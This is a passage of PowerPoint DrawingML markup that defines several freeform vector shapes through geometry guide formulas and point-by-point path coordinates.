                  <a:gd name="T2" fmla="*/ 142 w 731"/>
                  <a:gd name="T3" fmla="*/ 357 h 395"/>
                  <a:gd name="T4" fmla="*/ 47 w 731"/>
                  <a:gd name="T5" fmla="*/ 320 h 395"/>
                  <a:gd name="T6" fmla="*/ 53 w 731"/>
                  <a:gd name="T7" fmla="*/ 310 h 395"/>
                  <a:gd name="T8" fmla="*/ 53 w 731"/>
                  <a:gd name="T9" fmla="*/ 310 h 395"/>
                  <a:gd name="T10" fmla="*/ 63 w 731"/>
                  <a:gd name="T11" fmla="*/ 273 h 395"/>
                  <a:gd name="T12" fmla="*/ 68 w 731"/>
                  <a:gd name="T13" fmla="*/ 241 h 395"/>
                  <a:gd name="T14" fmla="*/ 74 w 731"/>
                  <a:gd name="T15" fmla="*/ 215 h 395"/>
                  <a:gd name="T16" fmla="*/ 68 w 731"/>
                  <a:gd name="T17" fmla="*/ 189 h 395"/>
                  <a:gd name="T18" fmla="*/ 68 w 731"/>
                  <a:gd name="T19" fmla="*/ 189 h 395"/>
                  <a:gd name="T20" fmla="*/ 58 w 731"/>
                  <a:gd name="T21" fmla="*/ 163 h 395"/>
                  <a:gd name="T22" fmla="*/ 47 w 731"/>
                  <a:gd name="T23" fmla="*/ 142 h 395"/>
                  <a:gd name="T24" fmla="*/ 26 w 731"/>
                  <a:gd name="T25" fmla="*/ 121 h 395"/>
                  <a:gd name="T26" fmla="*/ 0 w 731"/>
                  <a:gd name="T27" fmla="*/ 105 h 395"/>
                  <a:gd name="T28" fmla="*/ 42 w 731"/>
                  <a:gd name="T29" fmla="*/ 0 h 395"/>
                  <a:gd name="T30" fmla="*/ 730 w 731"/>
                  <a:gd name="T31" fmla="*/ 252 h 395"/>
                  <a:gd name="T32" fmla="*/ 682 w 731"/>
                  <a:gd name="T33" fmla="*/ 394 h 395"/>
                  <a:gd name="T34" fmla="*/ 189 w 731"/>
                  <a:gd name="T35" fmla="*/ 215 h 3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31" h="395">
                    <a:moveTo>
                      <a:pt x="189" y="215"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="215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1" name="Freeform 19"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2693988" y="2770188"/>
                <a:ext cx="71437" cy="68262"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 199 w 200"/>
                  <a:gd name="T1" fmla="*/ 63 h 190"/>
                  <a:gd name="T2" fmla="*/ 147 w 200"/>
                  <a:gd name="T3" fmla="*/ 189 h 190"/>
                  <a:gd name="T4" fmla="*/ 0 w 200"/>
                  <a:gd name="T5" fmla="*/ 126 h 190"/>
                  <a:gd name="T6" fmla="*/ 52 w 200"/>
                  <a:gd name="T7" fmla="*/ 0 h 190"/>
                  <a:gd name="T8" fmla="*/ 199 w 200"/>
                  <a:gd name="T9" fmla="*/ 63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" h="190">
                    <a:moveTo>
                      <a:pt x="199" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="147" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="63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2" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2540000" y="2514600"/>
                <a:ext cx="263525" cy="244475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 116 w 731"/>
                  <a:gd name="T1" fmla="*/ 115 h 678"/>
                  <a:gd name="T2" fmla="*/ 116 w 731"/>
                  <a:gd name="T3" fmla="*/ 115 h 678"/>
                  <a:gd name="T4" fmla="*/ 142 w 731"/>
                  <a:gd name="T5" fmla="*/ 68 h 678"/>
                  <a:gd name="T6" fmla="*/ 179 w 731"/>
                  <a:gd name="T7" fmla="*/ 37 h 678"/>
                  <a:gd name="T8" fmla="*/ 179 w 731"/>
                  <a:gd name="T9" fmla="*/ 37 h 678"/>
                  <a:gd name="T10" fmla="*/ 210 w 731"/>
                  <a:gd name="T11" fmla="*/ 15 h 678"/>
                  <a:gd name="T12" fmla="*/ 252 w 731"/>
                  <a:gd name="T13" fmla="*/ 0 h 678"/>
                  <a:gd name="T14" fmla="*/ 252 w 731"/>
                  <a:gd name="T15" fmla="*/ 0 h 678"/>
                  <a:gd name="T16" fmla="*/ 289 w 731"/>
                  <a:gd name="T17" fmla="*/ 0 h 678"/>
                  <a:gd name="T18" fmla="*/ 331 w 731"/>
                  <a:gd name="T19" fmla="*/ 5 h 678"/>
                  <a:gd name="T20" fmla="*/ 331 w 731"/>
                  <a:gd name="T21" fmla="*/ 5 h 678"/>
                  <a:gd name="T22" fmla="*/ 368 w 731"/>
                  <a:gd name="T23" fmla="*/ 15 h 678"/>
                  <a:gd name="T24" fmla="*/ 405 w 731"/>
                  <a:gd name="T25" fmla="*/ 32 h 678"/>
                  <a:gd name="T26" fmla="*/ 405 w 731"/>
                  <a:gd name="T27" fmla="*/ 32 h 678"/>
                  <a:gd name="T28" fmla="*/ 452 w 731"/>
                  <a:gd name="T29" fmla="*/ 58 h 678"/>
                  <a:gd name="T30" fmla="*/ 489 w 731"/>
                  <a:gd name="T31" fmla="*/ 89 h 678"/>
                  <a:gd name="T32" fmla="*/ 489 w 731"/>
                  <a:gd name="T33" fmla="*/ 89 h 678"/>
                  <a:gd name="T34" fmla="*/ 515 w 731"/>
                  <a:gd name="T35" fmla="*/ 126 h 678"/>
                  <a:gd name="T36" fmla="*/ 530 w 731"/>
                  <a:gd name="T37" fmla="*/ 162 h 678"/>
                  <a:gd name="T38" fmla="*/ 530 w 731"/>
                  <a:gd name="T39" fmla="*/ 162 h 678"/>
                  <a:gd name="T40" fmla="*/ 536 w 731"/>
                  <a:gd name="T41" fmla="*/ 205 h 678"/>
                  <a:gd name="T42" fmla="*/ 530 w 731"/>
                  <a:gd name="T43" fmla="*/ 247 h 678"/>
                  <a:gd name="T44" fmla="*/ 530 w 731"/>
                  <a:gd name="T45" fmla="*/ 247 h 678"/>
                  <a:gd name="T46" fmla="*/ 520 w 731"/>
                  <a:gd name="T47" fmla="*/ 294 h 678"/>
                  <a:gd name="T48" fmla="*/ 504 w 731"/>
                  <a:gd name="T49" fmla="*/ 341 h 678"/>
                  <a:gd name="T50" fmla="*/ 467 w 731"/>
                  <a:gd name="T51" fmla="*/ 415 h 678"/>
                  <a:gd name="T52" fmla="*/ 730 w 731"/>
                  <a:gd name="T53" fmla="*/ 546 h 678"/>
                  <a:gd name="T54" fmla="*/ 667 w 731"/>
                  <a:gd name="T55" fmla="*/ 677 h 678"/>
                  <a:gd name="T56" fmla="*/ 0 w 731"/>
                  <a:gd name="T57" fmla="*/ 346 h 678"/>
                  <a:gd name="T58" fmla="*/ 116 w 731"/>
                  <a:gd name="T59" fmla="*/ 115 h 678"/>
                  <a:gd name="T60" fmla="*/ 399 w 731"/>
                  <a:gd name="T61" fmla="*/ 305 h 678"/>
                  <a:gd name="T62" fmla="*/ 399 w 731"/>
                  <a:gd name="T63" fmla="*/ 305 h 678"/>
                  <a:gd name="T64" fmla="*/ 405 w 731"/>
                  <a:gd name="T65" fmla="*/ 283 h 678"/>
                  <a:gd name="T66" fmla="*/ 409 w 731"/>
                  <a:gd name="T67" fmla="*/ 262 h 678"/>
                  <a:gd name="T68" fmla="*/ 409 w 731"/>
                  <a:gd name="T69" fmla="*/ 247 h 678"/>
                  <a:gd name="T70" fmla="*/ 405 w 731"/>
                  <a:gd name="T71" fmla="*/ 226 h 678"/>
                  <a:gd name="T72" fmla="*/ 405 w 731"/>
                  <a:gd name="T73" fmla="*/ 226 h 678"/>
                  <a:gd name="T74" fmla="*/ 399 w 731"/>
                  <a:gd name="T75" fmla="*/ 210 h 678"/>
                  <a:gd name="T76" fmla="*/ 383 w 731"/>
                  <a:gd name="T77" fmla="*/ 194 h 678"/>
                  <a:gd name="T78" fmla="*/ 368 w 731"/>
                  <a:gd name="T79" fmla="*/ 179 h 678"/>
                  <a:gd name="T80" fmla="*/ 342 w 731"/>
                  <a:gd name="T81" fmla="*/ 162 h 678"/>
                  <a:gd name="T82" fmla="*/ 342 w 731"/>
                  <a:gd name="T83" fmla="*/ 162 h 678"/>
                  <a:gd name="T84" fmla="*/ 315 w 731"/>
                  <a:gd name="T85" fmla="*/ 152 h 678"/>
                  <a:gd name="T86" fmla="*/ 294 w 731"/>
                  <a:gd name="T87" fmla="*/ 147 h 678"/>
                  <a:gd name="T88" fmla="*/ 273 w 731"/>
                  <a:gd name="T89" fmla="*/ 147 h 678"/>
                  <a:gd name="T90" fmla="*/ 258 w 731"/>
                  <a:gd name="T91" fmla="*/ 147 h 678"/>
                  <a:gd name="T92" fmla="*/ 258 w 731"/>
                  <a:gd name="T93" fmla="*/ 147 h 678"/>
                  <a:gd name="T94" fmla="*/ 236 w 731"/>
                  <a:gd name="T95" fmla="*/ 158 h 678"/>
                  <a:gd name="T96" fmla="*/ 221 w 731"/>
                  <a:gd name="T97" fmla="*/ 168 h 678"/>
                  <a:gd name="T98" fmla="*/ 205 w 731"/>
                  <a:gd name="T99" fmla="*/ 184 h 678"/>
                  <a:gd name="T100" fmla="*/ 195 w 731"/>
                  <a:gd name="T101" fmla="*/ 210 h 678"/>
                  <a:gd name="T102" fmla="*/ 168 w 731"/>
                  <a:gd name="T103" fmla="*/ 262 h 678"/>
                  <a:gd name="T104" fmla="*/ 368 w 731"/>
                  <a:gd name="T105" fmla="*/ 362 h 678"/>
                  <a:gd name="T106" fmla="*/ 399 w 731"/>
                  <a:gd name="T107" fmla="*/ 305 h 6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31" h="678">
                    <a:moveTo>
                      <a:pt x="116" y="115"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="116" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="115"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="399" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="399" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="305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3" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2635250" y="2368550"/>
                <a:ext cx="307975" cy="219075"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 856"/>
                  <a:gd name="T1" fmla="*/ 110 h 610"/>
                  <a:gd name="T2" fmla="*/ 283 w 856"/>
                  <a:gd name="T3" fmla="*/ 231 h 610"/>
                  <a:gd name="T4" fmla="*/ 283 w 856"/>
                  <a:gd name="T5" fmla="*/ 231 h 610"/>
                  <a:gd name="T6" fmla="*/ 283 w 856"/>
                  <a:gd name="T7" fmla="*/ 231 h 610"/>
                  <a:gd name="T8" fmla="*/ 267 w 856"/>
                  <a:gd name="T9" fmla="*/ 194 h 610"/>
                  <a:gd name="T10" fmla="*/ 267 w 856"/>
                  <a:gd name="T11" fmla="*/ 152 h 610"/>
                  <a:gd name="T12" fmla="*/ 273 w 856"/>
                  <a:gd name="T13" fmla="*/ 115 h 610"/>
                  <a:gd name="T14" fmla="*/ 289 w 856"/>
                  <a:gd name="T15" fmla="*/ 73 h 610"/>
                  <a:gd name="T16" fmla="*/ 289 w 856"/>
                  <a:gd name="T17" fmla="*/ 73 h 610"/>
                  <a:gd name="T18" fmla="*/ 310 w 856"/>
                  <a:gd name="T19" fmla="*/ 47 h 610"/>
                  <a:gd name="T20" fmla="*/ 330 w 856"/>
                  <a:gd name="T21" fmla="*/ 26 h 610"/>
                  <a:gd name="T22" fmla="*/ 351 w 856"/>
                  <a:gd name="T23" fmla="*/ 10 h 610"/>
                  <a:gd name="T24" fmla="*/ 378 w 856"/>
                  <a:gd name="T25" fmla="*/ 5 h 610"/>
                  <a:gd name="T26" fmla="*/ 378 w 856"/>
                  <a:gd name="T27" fmla="*/ 5 h 610"/>
                  <a:gd name="T28" fmla="*/ 404 w 856"/>
                  <a:gd name="T29" fmla="*/ 0 h 610"/>
                  <a:gd name="T30" fmla="*/ 436 w 856"/>
                  <a:gd name="T31" fmla="*/ 5 h 610"/>
                  <a:gd name="T32" fmla="*/ 467 w 856"/>
                  <a:gd name="T33" fmla="*/ 15 h 610"/>
                  <a:gd name="T34" fmla="*/ 498 w 856"/>
                  <a:gd name="T35" fmla="*/ 31 h 610"/>
                  <a:gd name="T36" fmla="*/ 855 w 856"/>
                  <a:gd name="T37" fmla="*/ 246 h 610"/>
                  <a:gd name="T38" fmla="*/ 782 w 856"/>
                  <a:gd name="T39" fmla="*/ 367 h 610"/>
                  <a:gd name="T40" fmla="*/ 451 w 856"/>
                  <a:gd name="T41" fmla="*/ 173 h 610"/>
                  <a:gd name="T42" fmla="*/ 451 w 856"/>
                  <a:gd name="T43" fmla="*/ 173 h 610"/>
                  <a:gd name="T44" fmla="*/ 420 w 856"/>
                  <a:gd name="T45" fmla="*/ 157 h 610"/>
                  <a:gd name="T46" fmla="*/ 393 w 856"/>
                  <a:gd name="T47" fmla="*/ 152 h 610"/>
                  <a:gd name="T48" fmla="*/ 393 w 856"/>
                  <a:gd name="T49" fmla="*/ 152 h 610"/>
                  <a:gd name="T50" fmla="*/ 373 w 856"/>
                  <a:gd name="T51" fmla="*/ 162 h 610"/>
                  <a:gd name="T52" fmla="*/ 351 w 856"/>
                  <a:gd name="T53" fmla="*/ 183 h 610"/>
                  <a:gd name="T54" fmla="*/ 351 w 856"/>
                  <a:gd name="T55" fmla="*/ 183 h 610"/>
                  <a:gd name="T56" fmla="*/ 346 w 856"/>
                  <a:gd name="T57" fmla="*/ 199 h 610"/>
                  <a:gd name="T58" fmla="*/ 341 w 856"/>
                  <a:gd name="T59" fmla="*/ 215 h 610"/>
                  <a:gd name="T60" fmla="*/ 341 w 856"/>
                  <a:gd name="T61" fmla="*/ 231 h 610"/>
                  <a:gd name="T62" fmla="*/ 346 w 856"/>
                  <a:gd name="T63" fmla="*/ 246 h 610"/>
                  <a:gd name="T64" fmla="*/ 351 w 856"/>
                  <a:gd name="T65" fmla="*/ 257 h 610"/>
                  <a:gd name="T66" fmla="*/ 362 w 856"/>
                  <a:gd name="T67" fmla="*/ 272 h 610"/>
                  <a:gd name="T68" fmla="*/ 393 w 856"/>
                  <a:gd name="T69" fmla="*/ 299 h 610"/>
                  <a:gd name="T70" fmla="*/ 714 w 856"/>
                  <a:gd name="T71" fmla="*/ 488 h 610"/>
                  <a:gd name="T72" fmla="*/ 640 w 856"/>
                  <a:gd name="T73" fmla="*/ 609 h 610"/>
                  <a:gd name="T74" fmla="*/ 0 w 856"/>
                  <a:gd name="T75" fmla="*/ 231 h 610"/>
                  <a:gd name="T76" fmla="*/ 73 w 856"/>
                  <a:gd name="T77" fmla="*/ 110 h 6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856" h="610">
                    <a:moveTo>
                      <a:pt x="73" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="11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4" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2786063" y="2195513"/>
                <a:ext cx="257175" cy="271462"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 572 w 715"/>
                  <a:gd name="T1" fmla="*/ 666 h 756"/>
                  <a:gd name="T2" fmla="*/ 572 w 715"/>
                  <a:gd name="T3" fmla="*/ 666 h 756"/>
                  <a:gd name="T4" fmla="*/ 582 w 715"/>
                  <a:gd name="T5" fmla="*/ 635 h 756"/>
                  <a:gd name="T6" fmla="*/ 588 w 715"/>
                  <a:gd name="T7" fmla="*/ 625 h 756"/>
                  <a:gd name="T8" fmla="*/ 582 w 715"/>
                  <a:gd name="T9" fmla="*/ 608 h 756"/>
                  <a:gd name="T10" fmla="*/ 582 w 715"/>
                  <a:gd name="T11" fmla="*/ 608 h 756"/>
                  <a:gd name="T12" fmla="*/ 572 w 715"/>
                  <a:gd name="T13" fmla="*/ 582 h 756"/>
                  <a:gd name="T14" fmla="*/ 551 w 715"/>
                  <a:gd name="T15" fmla="*/ 561 h 756"/>
                  <a:gd name="T16" fmla="*/ 0 w 715"/>
                  <a:gd name="T17" fmla="*/ 372 h 756"/>
                  <a:gd name="T18" fmla="*/ 89 w 715"/>
                  <a:gd name="T19" fmla="*/ 247 h 756"/>
                  <a:gd name="T20" fmla="*/ 451 w 715"/>
                  <a:gd name="T21" fmla="*/ 399 h 756"/>
                  <a:gd name="T22" fmla="*/ 451 w 715"/>
                  <a:gd name="T23" fmla="*/ 399 h 756"/>
                  <a:gd name="T24" fmla="*/ 178 w 715"/>
                  <a:gd name="T25" fmla="*/ 120 h 756"/>
                  <a:gd name="T26" fmla="*/ 257 w 715"/>
                  <a:gd name="T27" fmla="*/ 0 h 756"/>
                  <a:gd name="T28" fmla="*/ 608 w 715"/>
                  <a:gd name="T29" fmla="*/ 409 h 756"/>
                  <a:gd name="T30" fmla="*/ 608 w 715"/>
                  <a:gd name="T31" fmla="*/ 409 h 756"/>
                  <a:gd name="T32" fmla="*/ 651 w 715"/>
                  <a:gd name="T33" fmla="*/ 461 h 756"/>
                  <a:gd name="T34" fmla="*/ 682 w 715"/>
                  <a:gd name="T35" fmla="*/ 504 h 756"/>
                  <a:gd name="T36" fmla="*/ 682 w 715"/>
                  <a:gd name="T37" fmla="*/ 504 h 756"/>
                  <a:gd name="T38" fmla="*/ 703 w 715"/>
                  <a:gd name="T39" fmla="*/ 541 h 756"/>
                  <a:gd name="T40" fmla="*/ 714 w 715"/>
                  <a:gd name="T41" fmla="*/ 572 h 756"/>
                  <a:gd name="T42" fmla="*/ 714 w 715"/>
                  <a:gd name="T43" fmla="*/ 572 h 756"/>
                  <a:gd name="T44" fmla="*/ 714 w 715"/>
                  <a:gd name="T45" fmla="*/ 608 h 756"/>
                  <a:gd name="T46" fmla="*/ 708 w 715"/>
                  <a:gd name="T47" fmla="*/ 640 h 756"/>
                  <a:gd name="T48" fmla="*/ 708 w 715"/>
                  <a:gd name="T49" fmla="*/ 640 h 756"/>
                  <a:gd name="T50" fmla="*/ 693 w 715"/>
                  <a:gd name="T51" fmla="*/ 672 h 756"/>
                  <a:gd name="T52" fmla="*/ 667 w 715"/>
                  <a:gd name="T53" fmla="*/ 708 h 756"/>
                  <a:gd name="T54" fmla="*/ 635 w 715"/>
                  <a:gd name="T55" fmla="*/ 755 h 756"/>
                  <a:gd name="T56" fmla="*/ 546 w 715"/>
                  <a:gd name="T57" fmla="*/ 698 h 756"/>
                  <a:gd name="T58" fmla="*/ 546 w 715"/>
                  <a:gd name="T59" fmla="*/ 698 h 756"/>
                  <a:gd name="T60" fmla="*/ 572 w 715"/>
                  <a:gd name="T61" fmla="*/ 666 h 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15" h="756">
                    <a:moveTo>
                      <a:pt x="572" y="666"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="572" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="698"/>
